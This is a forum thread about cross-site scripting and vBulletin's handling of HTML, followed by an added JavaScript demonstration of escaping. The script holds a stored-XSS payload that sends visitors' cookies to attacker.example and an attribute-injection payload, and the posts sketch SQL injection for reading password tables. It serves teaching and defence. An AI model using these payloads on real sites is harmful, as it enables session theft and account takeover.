Cross Site Scripting

Status
Not open for further replies.

Phantasm66

My new thing I'm into is Cross Site Scripting (XSS). This is how you manipulate URLs and user input into web applications in order to exploit security holes. Even the websites of major banks have these kinds of problems.

A forum like this is a prime example, where some kind of malicious code could be injected into the page - say in a post - and executed by everyone who visits the page.

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allows code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Recently, vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits.

http://en.wikipedia.org/wiki/XSS

Watch the movie!!!: http://ruslug.rutgers.edu/downloads/geek-movies/whiteHat_hacking_intranets.mp4
 
The article, while a bit deep for me (I'm not very experienced in web programming), was interesting. So would an XSS hole result if somebody typed malicious HTML code into a message on TS? Or would the forum have to support HTML code for it to work?
 
Software like this forum has these kinds of flaws, yes.

I don't know what they specifically are for this software, or the version, but doubtless there will be all sorts of things you can do.

One example would be an injected SQL query that could query the metadata tables. From there you could work out the table that held the usernames and passwords. If you could somehow read this table by further injecting SQL then you could find all the members' passwords and log in as someone else.

SQL injection is just one possible technique, though. Another might be to have JavaScript embedded in this page that, when run on YOUR machine, does something malicious like calling an ActiveX control to change something in your registry, or turn your firewall off.
 
But how could a user inject that code into the page? It seems that vBulletin automatically changes < and > signs into &lt; and &gt; so that they aren't mistaken by the browser for HTML code.

Wouldn't it be dangerous to have a vB forum with HTML allowed, though?

TS's Posting Rules said:
vB code is On
Smilies are On
code is On
HTML code is Off

That HTML code thingy seems to say that vBulletin would support it if TS would allow it. Kinda scary when you think of the type of HTML code people could put there. I'd guess it would be possible to embed a malicious Flash object or something (via <param>).
 
I'm no expert (at this stage), but I'd say that if the software properly sanitized user input to prevent scripting or SQL from being injected (vBulletin automatically changing < and > signs sounds like a good start), then it would be safe. But then again, I'm just starting to learn about this myself.

If anyone else has any insights I'd love to hear them.
 
Well, as a test, I'll post the < and > symbols and check the page source to see whether or not vB changes them to &gt; and &lt;.
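As an added example (not code from this thread, and not vBulletin's own code), the following script models what the posts above argue about: a forum that stores a post body and renders it for every visitor, with the "HTML code is Off/On" setting, the payload-in-a-post scenario from the earlier reply, and the "view source and look for &lt;" check proposed just above. It goes one step beyond the thread by also rendering user input inside an attribute value, where escaping only < and > (what the thread observes vBulletin doing) is not enough. Every function name, the payloads, the user "mallory" and the host attacker.example are constructed for this example.

```javascript
// Added example, not code from the thread or from vBulletin. It models a forum
// that stores a post body and renders it for other visitors, with the "HTML code
// is Off/On" setting from the thread, to show why escaping matters and where
// escaping only < and > is not enough. All function names, payloads and the host
// attacker.example are constructed for this example.

const ENTITY_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Full HTML-entity escaping of the characters that can change markup structure
// in both text and quoted-attribute context. One pass, so '&' is not double-escaped.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ENTITY_MAP[ch]);
}

// What the thread observed vBulletin doing: only < and > become entities.
function escapeAngleOnly(text) {
  return String(text).replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Render one post into the page. htmlAllowed models "HTML code is On".
function renderPost(author, body, { htmlAllowed = false } = {}) {
  const safeBody = htmlAllowed ? body : escapeHtml(body);
  return `<div class="post"><b>${escapeHtml(author)}</b><p>${safeBody}</p></div>`;
}

// Render a user-supplied display name inside an attribute value as well as in text.
// escapeFn is the escaping routine under test.
function renderProfileLink(displayName, escapeFn) {
  const v = escapeFn(displayName);
  return `<a href="/member.php?name=${v}">${v}</a>`;
}

// Minimal model of browser start-tag tokenising: tag name plus attribute names.
// Quoted values are consumed whole, so a literal '"' inside user input can
// terminate a value and start a new attribute, exactly as in a real parser.
const TAG_RE = /<([a-zA-Z][\w-]*)([^>]*)>/g;
const ATTR_RE = /\s*([^\s=>"'\/]+)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s>]+))?/g;

function startTags(html) {
  const tags = [];
  for (const m of html.matchAll(TAG_RE)) {
    const attrs = [...m[2].matchAll(ATTR_RE)].map((a) => a[1].toLowerCase());
    tags.push({ name: m[1].toLowerCase(), attrs });
  }
  return tags;
}

// True if the rendered HTML contains a <script> tag or any on* event-handler
// attribute, i.e. markup the browser would execute on the visitor's machine.
function containsActiveMarkup(html) {
  return startTags(html).some(
    (t) => t.name === 'script' || t.attrs.some((a) => a.startsWith('on'))
  );
}

// Constructed payloads. The first is the stored-XSS case discussed in the thread;
// the second targets an attribute context, where < and > are not needed at all.
const SCRIPT_PAYLOAD =
  '<script>document.location="http://attacker.example/?c="+document.cookie</script>';
const ATTR_PAYLOAD = 'x" onmouseover="alert(document.cookie)';

// Outcomes for the four cases; a reader can reproduce them with node.
const results = {
  htmlOn: containsActiveMarkup(renderPost('mallory', SCRIPT_PAYLOAD, { htmlAllowed: true })),
  htmlOff: containsActiveMarkup(renderPost('mallory', SCRIPT_PAYLOAD)),
  angleOnlyInAttr: containsActiveMarkup(renderProfileLink(ATTR_PAYLOAD, escapeAngleOnly)),
  fullEscapeInAttr: containsActiveMarkup(renderProfileLink(ATTR_PAYLOAD, escapeHtml)),
};

console.log(results);
// The same check as "view source and look for &lt;" in the thread:
console.log(renderPost('mallory', SCRIPT_PAYLOAD));
```

With HTML off, the `<script>` payload reaches the page as `&lt;script&gt;...` and the tokenizer sees only div, b and p tags, which is what a look at the page source would confirm. With HTML on, the same post carries an executable script tag to every visitor. The profile-link case shows the limit of escaping only < and >: a display name containing a double quote closes the `href` value and adds an `onmouseover` attribute without using either character, while full entity escaping keeps it inside the attribute value.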
 